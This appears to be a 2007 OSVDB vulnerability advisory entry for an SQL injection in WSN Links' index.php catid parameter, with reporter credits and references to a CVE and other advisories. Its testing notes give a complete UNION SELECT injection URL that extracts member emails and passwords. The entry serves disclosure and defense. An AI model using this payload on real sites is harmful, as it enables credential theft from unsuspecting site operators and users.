WSN Links index.php catid Variable SQL Injection

2007-07-21T00:00:00
ID OSVDB:36270
Type osvdb
Reporter xprog(), t0pP8uZz()
Modified 2007-07-21T00:00:00

Description

Manual Testing Notes

http://[target]/Script_Dir/index.php?action=displaycat&catid=1//and//1=2//UNION//ALL//SELECT//1,2,3,4,5,6,7,8,9,10,11,concat(email,0x3a,password),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35//FROM//wsnlinks_members//LIMIT//0,1/*

References:

Secunia Advisory ID:26246 Other Advisory URL: http://milw0rm.com/exploits/4209 ISS X-Force ID: 35543 FrSIRT Advisory: ADV-2007-2615 CVE-2007-3981 Bugtraq ID: 24996